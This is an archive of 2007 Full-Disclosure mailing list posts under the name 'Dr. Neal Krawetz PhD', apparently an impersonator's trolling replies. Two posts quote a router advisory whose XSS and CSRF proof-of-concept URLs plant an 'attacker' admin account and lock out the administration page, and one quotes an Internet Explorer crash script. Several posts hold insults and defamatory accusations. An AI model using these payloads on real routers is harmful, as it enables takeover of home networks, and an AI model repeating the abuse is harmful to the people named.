Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

2007-06-27 Thread Dr. Neal Krawetz PhD
Send it over here.  The picture, not the hash.  I have the technologies
to determine whether the image is computer generated, digitally altered,
or legitimately a real picture!

These technologies shall be unveiled at Blackhat during my presentation.
Sometimes it is difficult to determine which asses are real in this
facade that is the computer security world.

- doc neal
http://www.hackerfactor.com/blog/

ps: if time provides during my speech, I will discuss the many
difficulties I have experienced as a computer security consultant while
attempting to have fake myspace accounts shut down for my clients!

On Wed, Jun 27, 2007 at 01:48:45PM -0400, Jared DeMott wrote:
 Month of Random Hashes wrote:
  [ITEM #1]  == my hinney
  sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398
 Took a picture of my backend and would like to post the hash.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread Dr. Neal Krawetz PhD
We heard you the first time, gobbles aka n3td3v.

- doc neal
http://www.hackerfactor.com/blog/

On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml
 
 If you bothered that much you deserve the advisory I guess :-D.
 
 btw, I didn't know google pages have sitemap.xml enabled by default.
 
 So no hash cracking here, just to set things straight.
 
 Joey Mengele wrote:
  After plugging this hash into John The Ripper, I was able to
  reproduce the text of the original advisory. It follows in
  entirety. For those wishing to verify the hash provided by the
  architect, I have also included the advisory in attachment form as
  a convenience for the skeptics who say MD5 can not be reversed.
 
  J
 
  ___ BEGIN LAME CRACKED ADVISORY ___
  Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
  SpeedBooster (WAG54GS)
 
  == Date found ==
 
  24 June 2007
 
  == Firmware Version ==
 
  V1.00.06
 
  == Description ==
 
 
  There are several persistent XSS vulnerabilities on the
  '/setup.cgi' script.
 
  It is possible to inject JavaScript by assigning a payload like the
  following
  to any of the vulnerable parameters:
 
  script[PAYLOAD]/script
 
  The vulnerable (non-sanitized) parameters are the following:
 
  'devname'
  'snmp_getcomm'
  'snmp_setcomm'
  'c4_trap_ip_'
 
  Additionally, all HTTP requests are not tokenized using non-
  predictable values.
  Thus, all requests to the router's HTTP interface are vulnerable to
  Cross-site
  Request Forgeries (CSRF), perhaps by design.
 
  The following is an example of a HTTP request (notice the lack of
  non-predictable tokens):
 
  POST /setup.cgi HTTP/1.1
  Authorization: Basic YWRtaW46YWRtaW4=
 
  mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file
  =Factorydefaults.htmnext_file=index.htmmessage=
 
  Although the original request is a POST, we can convert it to a
  GET, so that all posted parameters can be submitted on a single URL.
 
  For example, the previous POST request can be converted to a URL
  such as the following:
 
  http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor
  y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f
  ile=index.htmmessage=
 
  By forging administrative requests (Administration button on the
  router's HTML menu), an attacker can compromise the router provided
  the
  victim user visits a malicious URL or HTML page.
 
  The attack can only be successfuly if any of the following
  conditions are met:
 
  - the administrator hasn't changed the default credentials
  (admin/admin)
  - the administrator's browser has an active authentication session
  with the router's interface when the attack happens
(highly unlikely)
 
 
  == Persistent XSS PoC ==
 
  The following URL creates a DoS condition by making the
  Administration page inaccessible since 'history.back()'
  will run everytime the Administration page is visited. Thus the
  administrator won't be able to ever change the
  default credentials unless a hard reset is performed on using the
  router's physical restart switch:
 
  http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin
  sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp
  _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e
  nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged=
  yesh_remote_management=enablec4_trap_ip_=scripthistory.back()
  /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena
  bletodo=savethis_file=Administration.htmnext_file=Administration.
  htmmessage=
  http://tinyurl.com/36sjzw
 
 
  == CSRF PoC ==
 
  The following HTML page does the following:
 
  - adds an *additional* administrative account, with a username
  equals to 'attacker' and a password equals to '0wned' (without
  removing original admin account!)
  - enables remote HTTP management over port 1337
  - sets other settings that are inrelevant to this discussion
 
  html
  body
  script
  // send 2 requests to add an administrative account and enable
  remote management
  // tries with default credentials and with credentials cached by
  browser (if any)
 
  var img = new Image();
  var img2 = new Image();
 
  img.src =
  'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack
  ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh
  ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla
  n_enable=enablesave=Save+Settingsh_user_list=8h_pwset=yespwchang
  ed=yesh_remote_management=enablec4_trap_ip_=h_snmp_enable=disable
  h_upnp_enable=enableh_wlan_enable=enabletodo=savethis_file=Admin
  istration.htmnext_file=Administration.htmmessage=';
  img2.src =
  'http://192.168.1.1/setup.cgi?user_list=8sysname=attackersysPasswd
  

Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread Dr. Neal Krawetz PhD
I believe this makes you the fool.

- doc neal, phd
http://www.hackerfactor.com/blog/


On Wed, Jun 27, 2007 at 11:07:11PM +0100, pagvac wrote:
 I didn't intend to send it twice.
 
 On 6/27/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote:
 We heard you the first time, gobbles aka n3td3v.
 
 - doc neal
 http://www.hackerfactor.com/blog/
 
 On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml
 
  If you bothered that much you deserve the advisory I guess :-D.
 
  btw, I didn't know google pages have sitemap.xml enabled by default.
 
  So no hash cracking here, just to set things straight.
 
  Joey Mengele wrote:
   After plugging this hash into John The Ripper, I was able to
   reproduce the text of the original advisory. It follows in
   entirety. For those wishing to verify the hash provided by the
   architect, I have also included the advisory in attachment form as
   a convenience for the skeptics who say MD5 can not be reversed.
  
   J
  
   ___ BEGIN LAME CRACKED ADVISORY ___
   Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
   SpeedBooster (WAG54GS)
  
   == Date found ==
  
   24 June 2007
  
   == Firmware Version ==
  
   V1.00.06
  
   == Description ==
  
  
   There are several persistent XSS vulnerabilities on the
   '/setup.cgi' script.
  
   It is possible to inject JavaScript by assigning a payload like the
   following
   to any of the vulnerable parameters:
  
   script[PAYLOAD]/script
  
   The vulnerable (non-sanitized) parameters are the following:
  
   'devname'
   'snmp_getcomm'
   'snmp_setcomm'
   'c4_trap_ip_'
  
   Additionally, all HTTP requests are not tokenized using non-
   predictable values.
   Thus, all requests to the router's HTTP interface are vulnerable to
   Cross-site
   Request Forgeries (CSRF), perhaps by design.
  
   The following is an example of a HTTP request (notice the lack of
   non-predictable tokens):
  
   POST /setup.cgi HTTP/1.1
   Authorization: Basic YWRtaW46YWRtaW4=
  
   mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file
   =Factorydefaults.htmnext_file=index.htmmessage=
  
   Although the original request is a POST, we can convert it to a
   GET, so that all posted parameters can be submitted on a single URL.
  
   For example, the previous POST request can be converted to a URL
   such as the following:
  
   http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor
   y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f
   ile=index.htmmessage=
  
   By forging administrative requests (Administration button on the
   router's HTML menu), an attacker can compromise the router provided
   the
   victim user visits a malicious URL or HTML page.
  
   The attack can only be successfuly if any of the following
   conditions are met:
  
   - the administrator hasn't changed the default credentials
   (admin/admin)
   - the administrator's browser has an active authentication session
   with the router's interface when the attack happens
 (highly unlikely)
  
  
   == Persistent XSS PoC ==
  
   The following URL creates a DoS condition by making the
   Administration page inaccessible since 'history.back()'
   will run everytime the Administration page is visited. Thus the
   administrator won't be able to ever change the
   default credentials unless a hard reset is performed on using the
   router's physical restart switch:
  
   http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin
   sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp
   _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e
   nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged=
   yesh_remote_management=enablec4_trap_ip_=scripthistory.back()
   /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena
   bletodo=savethis_file=Administration.htmnext_file=Administration.
   htmmessage=
   http://tinyurl.com/36sjzw
  
  
   == CSRF PoC ==
  
   The following HTML page does the following:
  
   - adds an *additional* administrative account, with a username
   equals to 'attacker' and a password equals to '0wned' (without
   removing original admin account!)
   - enables remote HTTP management over port 1337
   - sets other settings that are inrelevant to this discussion
  
   html
   body
   script
   // send 2 requests to add an administrative account and enable
   remote management
   // tries with default credentials and with credentials cached 
 by
   browser (if any)
  
   var img = new Image();
   var img2 = new Image();
  
   img.src =
   'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack
   ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh
   ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla
   n_enable=enablesave

Re: [Full-disclosure] Month of Random Hashes: IMPORTANT ANNOUNCEMENT

2007-06-25 Thread Dr. Neal Krawetz PhD
gobbles/n3td3v,

Please stop replying to your own posts.  You are fooling no one.

- neal krawetz

http://www.hackerfactor.com

On Fri, Jun 22, 2007 at 08:07:39PM +0100, HACK THE GOV wrote:
 On 6/22/07, Month of Random Hashes [EMAIL PROTECTED] wrote:
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 The MoRH project has nothing to do with Dr. Neal Krawetz, PhD. /
 n3td3v / gobbles in any way.
 
 Please disregard his posts.
 
 They are trolls.
 
 FAQ coming soon.
 
 
 
 In what way are you not a troll? -- please put that in your FAQ.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Month Of Hackerrats Bugs

2007-06-18 Thread Dr. Neal Krawetz PhD
All,

[EMAIL PROTECTED] is just another identity that gobbles aka n3td3v
has created as part of his smear campaign against myself and other
prominent members of the computer security community.  It is best that
we just ignore him.  This is the only way to make him go away.

Thanks,
Dr. Neal Krawetz, PhD.
http://www.hackerfactor.com/blog/ 

On Sun, Jun 17, 2007 at 10:44:00PM -0700, J. M. Seitz wrote:
 Well, in response:
 
 1) If the Month of BS that you are spraying is all you can contribute to the
 security community, you are leagues behind Jericho who heads the OSVDB, VIM
 and does many other countless things, tirelessly day in and day out.
 
 2) Who cares? If the FBI or RCMP (in my case from Canada) comes knocking at
 my door, and they ask Hey, we know script kiddie XYZ sent you details on
 how they bypassed the Net Nanny filters at their high school. I wouldn't
 lose any sleep handing out info, I doubt neither would you.
 
 3) No one is really sure what you are after here? Most people, like HD, did
 the month of.. To open the eyes of vendors, fame, tool releases, etc. This
 seems strange? Maybe lame responses like my own are the reason why?
 
 Aside from that, you are barking up the wrong tree going after Jericho..
 
 
 JS
  
 
  Following suit to the month of bugs - we are pleased to 
  announce the disclosures of cooperating snitches liars and 
  conmen in the industry. We present our second Hackerrat with 
  an eye opening Jericho
  
  Jericho (Brian Martin) and his cohorts at the website 
  Attrition were at one time mining hacker information for the 
  FBI. They will swear they didn%u2019t an offer a barrage of 
  verbally crafted nonsense to deter the truth about their 
  actions, but we know better. This information or 
  (Disinformation) comes via an earlier write up on the 
  Hackerrat terrorist known as Mark Maiffret and eEye Security.
  
  So how does Jericho tie into eEye anyway? Simple he does so 
  via way of Dale Coddington aka Punkis who worked at eEye. 
  Snitches of a feather flock together. See it worked like 
  this, once upon a time there was #dc-stuff, no wait, some may 
  not be ready for that. krystlia, malvu and other miscreants
  
  . Anynow there was Brian Martin hacking the NYTimes as HFG. 
  (don%u2019t worry Martin, I believe the US has a statute of 
  limitations). Never to be discovered perhaps because Adam 
  Penenburg would never disclose it, and perhaps because Martin 
  had some decent friends like Carole Fennelly. Why does 
  Jericho insist he never cooperated with the feds nor 
  disclosed any information to them. The truth is in front of 
  most, but most care not to look at the truth.
  
  Ask yourself logically, search any search engine, Lexis 
  Nexis, Google, find one instance of a case of federal agents 
  raiding someone's home and walking out without a suspect. 
  You'd have better luck getting struck by lightning. So what 
  happened after FBI agents raided Martin's house once upon a 
  time? Truth be told, he cooperated with authorities and 
  provided them with log records for moronic developmentally 
  challenged idiots who were sending him proof of their hacks. 
  Thinks this is propaganda?
  
  Brian Martin's information is publicly available via what is 
  known in the United States as the Freedom of Information Act. 
  It is highly unlikely he'd appreciate this disclosure since 
  he would somehow have to prove everyone else except him is 
  lying. He would have to come back with discourse on how the 
  government is out to get him by carefully, selectively and 
  willfully injecting disinformation into his life records. Not 
  plausible. So a huge greeting to the federal snitch known as 
  Jericho and his gang of buddies at Attrition. This month's 
  second biggest federal snitch.
  
  http://hackerwars.blogsome.com/
  
  
  -
  Brought to you by Footard: http://www.footard.com Please 
  report spam to [EMAIL PROTECTED]
  
  
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Dear Neal Krawetz, will the real n3td3v please stand up?

2007-06-18 Thread Dr. Neal Krawetz PhD
If you believe my method(s) was flawed, then demonstrate your claim(s).

I used a repeatable scientific proof that conclusively proves my
findings.  People constantly criticize me, claiming that I am wrong.
However not one of these people are able to offer a valid scientific
argument against me or my methods!  

You are acting like an uneducated child.  Is this where you are?  Did
you even attend a school of higher learning?  I should hope that no
respected academic institution would allow such a pea-brained fool as
yourself entrance!

Grow up, learn, and come back to speak with me once you've learned what
logic is and how to apply it.  Until then you are nothing.  You are the
sort of person that believes bananas are proof that there is a God, when
the truth is there is no God.  You simple-minded doofus.

- neal

On Mon, Jun 18, 2007 at 05:42:07PM -0700, coderman wrote:
 On 6/18/07, HACK THE GOV [EMAIL PROTECTED] wrote:
  n3td3v is NOT Gobbles
  Gobbles is NOT n3td3v
 
 
 a biased mind peers into the chasm that is full-disclosure:
 
 Dr._Neal_Krawetz,_PhD. my god, it's full of [n3td3v | GOBBLES] !!!
 
 ... your paper was interesting and inherently flawed; may you one day
 discover the concept of compounded errors.
 
 consider GOBBLES the slim shady; n3td3v the pimply imitator in a ford
 festiva with plywood spoiler.  all you see is one annoyance, while
 intact intellect discerns the substance from the shallow.
 
 don't worry, i'm only pissing on your expert security credentials, Dr.
 Neal Krawetz, PhD., because i too am n3td3v... disguised via
 artificial intelligence softwarez!
 
 
 L'enfer, c'est les autres - Sartre
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Robert Lemos over Neal Krawetz forensic findings

2007-06-13 Thread Dr. Neal Krawetz PhD
gobbles/n3td3v,

Please stop trolling this professional forum and filling our inboxes
with this crap.  Grow up.

- neal

On Wed, Jun 13, 2007 at 09:24:17AM -0600, jt5944-27a wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 gobbles you sad little backwards retard you really need to get back
 on your meds and stop the drinking. your short term memory is
 pretty shot. let me help you out here.
 
  Both security groups responded to the Robert Lemos report on the
  Neal Krawetz findings with deep disapproval because of the
 unfounded
  research post to the Funsec mailing list by the HackFactor PhD
  scientist.
 
 the n3td3v group never told robert anything like this. the only
 thing
 n3td3v said was i am who i am.
 http://www.securityfocus.com/comments/articles/11419/34152/threaded#
 34152
 the only person who ever said n3td3v was gobbles was you gobbles.
 even the other members of n3td3v have not said anything publicly.
 you really need to stop drinking and typing. alcohol and autism
 dont go well together. have you tried lithium?
 
  Regardless of outcry and disapproval---both the former cnet
  journalist Robert Lemos and the PhD scientist have yet to
 apologize
  over the high-profile incident.
 
 the only outcry has been from you
 http://archives.neohapsis.com/archives/dailydave/2007-q2/0044.html
 the paper came out in october. why did you wait six months before
 taking offense? oh thats right - you went to follow other endeavors
 and didnt get kicked out until earlier this year.
 http://archives.neohapsis.com/archives/fulldisclosure/2006-
 09/0010.html
 
 remember gobbles taking a pink pill doesnt make you any less gay.
 http://www.luhs.org/health/kbase/htm/mdx-/drim/1565/mdx-drim1565.htm
 
 -BEGIN PGP SIGNATURE-
 Note: This signature can be verified at https://www.hushtools.com/verify
 Version: Hush 2.5
 
 wpwEAQECAAYFAkZwDAgACgkQiDw0BWMaDTGlswP+PsgLJeT7uqBpBfCVihoGpXP4xvJM
 rk8gaJbIuO6yViXLHN/QZJqwexmJweZIklDp7ovnt/8KdMaNLE7K52EJ61hlAndRW2yH
 g2bc4m7gdxQOc3GryxIFXvyeMrvL8NjXIAqGHh18HoYz7lLkvoOTll0oZv/SbBlGI9MY
 psrgjsw=
 =GglY
 -END PGP SIGNATURE-
 
 --
 Click to compare life insurance rates.  Great rates, quick and easy.
 http://tagline.hushmail.com/fc/CAaCXv1QSYR7tvktBPAigxyYpN5IfLTR/
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] New Vulnerability against Firefox/ Major Extensions

2007-05-30 Thread Dr. Neal Krawetz PhD
Gobbles aka n3td3v,

Please stop harassing aspiring young PhD students on this list.

I speak for everyone in this community when I say that we are all tired
of your shenanigans and that it is time for you to grow up.  Clearly
you do not have a PhD, and to the best of my knowledge you are not
actively pursuing one, and therefor have no voice in computer security.

To my fans:  I have just finished reading Niels Provos' work from 2001,
and plan on presenting a summary of these dated works at Blackhat 2007
this summer.  I look forward to seeing you all there!

Dr. Neal Krawetz, PhD

http://www.hackerfactor.com/
http://www.krawetz.org/


On Wed, May 30, 2007 at 11:57:59AM -0400, Joey Mengele wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Hello List,
 
 
 
 Frequently Asked Questions
 
 
 Q: Who is at risk?
 
 A: Anyone who has installed the Firefox Web Browser and one or
 more
 vulnerable extensions. These include, but are not limited to:
 Google
 Toolbar, Google Browser Sync, Yahoo Toolbar, Del.icio.us
 Extension,
 Facebook Toolbar, AOL Toolbar, Ask.com Toolbar, LinkedIn Browser
 Toolbar, Netcraft Anti-Phishing Toolbar, PhishTank SiteChecker.
 
 
 Don't you mean anyone who has these installed and is using a rogue
 or compromised DNS server?
 
 Q: How many people are at risk?
 
 A: Millions. Exact numbers for each toolbar/extension are not
 released
 by the vendors. Google Toolbar, which is one of the most popular
 of
 the vulnerable extensions, is installed as part of the download
 process with WinZip, RealNetworks' Real Player and Adobe's
 Shockwave.
 Google publicly pays website publishers $1 for each copy of
 Firefox +
 Google Toolbar that customers download and install through a
 publisher's website.
 
 Google confirmed in 2005 that their toolbar product's user base
 was
 in the millions. Given the number of distribution deals that
 have
 been signed, the number of users can only have grown in size
 since.
 
 
 Oh stop being such a drama queen. Are you suggesting millions
 have their DNS compromised and their home routers owned? Isn't this
 bug rather inconsequential for these people anyway?
 
 Q: When am I at risk?
 
 A: When you use a public wireless network, an untrusted Internet
 connection, or a wireless home router with the default password
 set.
 
 
 Duh. You don't need to be running some silly toolbar to be at risk
 in this scenario.
 
 Q: What can I do to reduce my risk?
 
 A: Users with wireless home routers should change their password
 to
 something other than the default.
 
 
 Are you really suggesting wide scale wireless home router
 compromise? Is there an army of hacker dudes driving around
 compromising unprotected wireless routers in the millions that I am
 not aware of? Surely the Security Focus PharmConMeter(TM) would
 have alerted me if this were the case!
 
 
 Q: Why is this attack possible?
 
 A: The problem stems from design flaws, false assumptions, and a
 lack
 of solid developer documentation instructing extension authors on
 the
 best way to secure their code.
 
 
 See also because your DNS server is owned
 
 --
 Description Of Vulnerability
 --
 
 
 Blabla, you are a technical genius. Let's move on Dr. Chris.
 
 
 ---
 When Are Users Vulnerable
 ---
 
 Users are most vulnerable to this attack when they cannot trust
 their
 domain name server. Examples of such a situation include:
 
 * Using a public or unencrypted wireless network.
 
 * Using a network router (wireless or wired) at home that has
 been
 infected/hacked through a drive by pharming attack. This
 particular
 risk can be heavily reduced by changing the default password on
 your
 home router.
 
 
 Hahahahahahha. Drive by pharming. What a fucking joke. This
 industry is the best.
 
 
 
 Fixing The Problem
 
 
 
 The number of vulnerable extensions is more lengthy than those
 listed
 in this document. Until vendors have fixed the problems, users
 should
 remove/disable all Firefox extensions except those that they are
 sure
 they have downloaded from the official Firefox Add-ons website
 (https://addons.mozilla.org). If in doubt, delete the extension,
 and
 then download it again from a safe place.
 
 
 No way dude, use The Internet Explorer!
 
 
 -
 Self Disclosure/Conflict of Interest Statement
 -
 
 
 Christopher Soghoian is a PhD student in the School of Informatics
 at
 Indiana University. He is a member of the Stop Phishing Research
 Group. His research is focused in the areas of phishing, click-
 fraud,
 search privacy and airport security. He has worked an intern with
 Google, Apple, IBM and Cybertrust. He is the co-inventor of
 several

[Full-disclosure] Fight Censorship on Full-Disclosure

2007-05-12 Thread Dr. Neal Krawetz PhD

Hello all,

It was brought to my attention that this list has become moderated. 

As a community, we must not stand for this!  We must join together and
fight the oppression.  

I have decided to host a mirror of the censored materials on my website.
As an American, I value free speech above all else, and will gladly give
my life defending this content.

George Bush, you can kiss my ass.  I didn't vote for you, and as far as
I am concerned you are not my president and no matter how many of my
Muslim brothers you massacre, I will not be intimidated and I will not
remove this content from my website.

Everyone, please download the following file and mirror it where ever
you can.  While it may seem cruel to the individuals named in here,
remember the greater good.  George Bush and his Marxist ways have no
place here on our good list.

http://www.krawetz.org/misc/censorship.txt

- neal
I am the last free man in America. - Dr. Neal Krawetz, PhD


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] UK ISP threatens security researcher

2007-04-18 Thread Dr. Neal Krawetz, PhD
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Let's keep in mind that publishing most security information
borders extortion.  There isn't any other industry where fat nerds
try to strongarm large corporations into admitting there are
weaknesses in their products, defaming them publicly, causing their
stock prices to fall, or otherwise damaging their public image and
thus causing financial damage, et cetera.

Gadi, I doubt your people would be thrilled if you tried to
petition Yahweh with complaints regarding His children being
vulnerable to pieces of metal fired at high velocity from guns, and
demanding that if things aren't fixed within what you consider a
satisfactory timeframe (which, in the end is just some arbitrary
number invented by people with no concept of industry and
economics) that you will arm every man, woman, child, and lizard of
bordering Arabic nations to Israel in order to teach that big guy
up in the sky a lesson about not making humans impervious to
gunfire!

Come on man!  You're smarter than this!  When socially inept people
who possess only rudimentary computer skills start bullying (call
it what you will, in the end if you argue against my points you
clearly are one of those people who can't make it in the real
world) corporations for fame and money, which have real-world
financial consequences to said corporate entities, you are in the
least committing extortion.  And while you might think these
efforts are noble, the reality of the situation is simple - this is
absolutely no different than a bunch of Russians with botnets,
forcing businesses to comply with their demands if that business
wishes to continue existing on the Internet.

When was the last time an auto manufacturer was humiliated publicly
because their car windows can easily be broken and contents of the
car stolen?  When have chain manufacturers been chastised by the
mass media for the existence of bolt cutters?  What about the
serious threat of hacksaws?

People, grow up.  If your life is spent behind a computer
discovering uninteresting oversights in software design, where you
clearly lack experience and ability, and proclaiming yourself the
#chatzone badass and drolling saying I'm the best evah!!! doesn't
make you important.  The sad state of this industry is that there
are enough ignorant people that find it impressive, and who don't
understand the ramifications of their publicity whoring and the
obvious parallels to other industries.

The long and short of it is:
  If you want to act like a criminal, be prepared to be treated
like a criminal, and don't cry about the choices you've made in
life.  You aren't a fucking martyr when your motivations and cause
are only self-promoting and otherwise selfish.

Always remember the embarrassment to hackers, humans, and Hebrews
everywhere that is Kevin Mitnick.

- - Dr. Neal Krawetz, PhD
http://www.hackerfactor.com/blog/

On Tue, 17 Apr 2007 19:30:54 -0400 Gadi Evron [EMAIL PROTECTED]
wrote:
http://www.theregister.com/2007/04/17/hackers_service_terminated/

A 21-year-old college student in London had his internet service
terminated and was threatened with legal action after publishing
details
of a critical vulnerability that can compromise the security of
the ISP's
subscribers.

I happen to know the guy, and I am saddened by this.

   Gadi.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYmCAUACgkQDpFP8dW5K4bwFgP/Z2cmOC7HiPZ9Bp1p0VqC/1IMv40l
Vxi/gS/jMQMDG9XiIZqnDQQwMGm8OhnBu6LfMPi66Xnfr9ZV5zcE3wCeqlRfDsyAuAD7
TvpzfqAfhdLDgfG6hmX9BBZdpALXIa4ijwKuo4zs5uqtA/najmlIwgDjmGXC1NefQsZP
acyWgT8=
=zSxl
-END PGP SIGNATURE-

--
Click here for free information on earning a criminal justice degree today.
http://tagline.hushmail.com/fc/CAaCXv1S4xxoKJy71c1syHceuiPxgdCh/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Internet Explorer Crash

2007-04-17 Thread Dr. Neal Krawetz, PhD
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have confirmed that both Adobe Photoshop 7.0 and 7.1 are
vulnerable to this issue.  However all versions of Paint Shop Pro
that I tested are not vulnerable.  I repeat, Paint Shop Pro is not
vulnerable to this issue.

Ubuntu is not vulnerable to this issue in any way.

Good find buddy!

- - Dr. Neal Krawetz, PhD
http://www.hackerfactor.com/blog/


On Tue, 17 Apr 2007 13:09:50 -0400 J. Oquendo
[EMAIL PROTECTED] wrote:
Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft
are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang.
The
memory and CPU usage go through the roof. Originally the script
caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every
other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

script

var reg = /(.)*/;

var z = 'Z';
while (z.length =
999

999
999

999
999

999
999

999
999) z+=z;
var boum = reg.exec(z);

/script

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYlQWQACgkQDpFP8dW5K4Z/bQQAhmwJc2y9RBZ7nFAEWo4Q/aIpvwVj
7Xa+Ax+CUSe1O+hINFX5I+hLoPckPNVoC3YtPA7rQqT6dQ3xIubFgZAGFs62v7p936yi
p4esv/frDaklOmlEGjVZqcoxJATwj8HBPthO3YZk5D1HRJhkQ0J72ucEkBgK6tw/YeuL
dUoEASE=
=FbVw
-END PGP SIGNATURE-

--
Become a medical transcriptionist at home, at your own pace.
http://tagline.hushmail.com/fc/CAaCXv1R3e4Y8wdXYkvHiVBp8Vi7B9M9/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] INVASION OF THE CHILD HACKERS

2007-04-16 Thread Dr. Neal Krawetz, PhD
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I just came across this article: More Women Online. The article
starts by saying:

eMarketer estimates that there will be an estimated 97.2
million female Internet users ages 3 and older in 2007, or 51.7% of
the total online population. In 2011, 109.7 million US females will
go online and amounting to 51.9% of the total online population.

Estimates from other research sources concur that females
represent the majority of US Internet users, ranging from 53%
(Arbitron and Edison Media Research and for Internet users ages 12
and older) down to 50.6% (comScore Media Metrix and for Internet
users ages 2 and older).


The increase in women online is only moderately interesting.
Particularly since surveys from a year ago reported that a majority
of Internet users under 30-years-old are female.

However and the thing that really got my attention was the age
range. They say “ages 3 and older”. What kind of 3-year-old is
surfing the web and using IM, and sending email? Between 3 and 5
years old and most children are just starting to learn the
alphabet. The average 5-year-old should be able to read simple
words. Granted, there are some online games for tots and is that
really the same as using the Internet? (Use a VCR or DVD player?
Sure and I've seen 2-year-olds do that… But a tot surfing the web?
Really?)

All of this makes me wonder… How soon before the RIAA begins suing
3-year-olds for illegal downloads? I mean and they have already
gone after a 7-year-old. (And the 7-year-old was female.
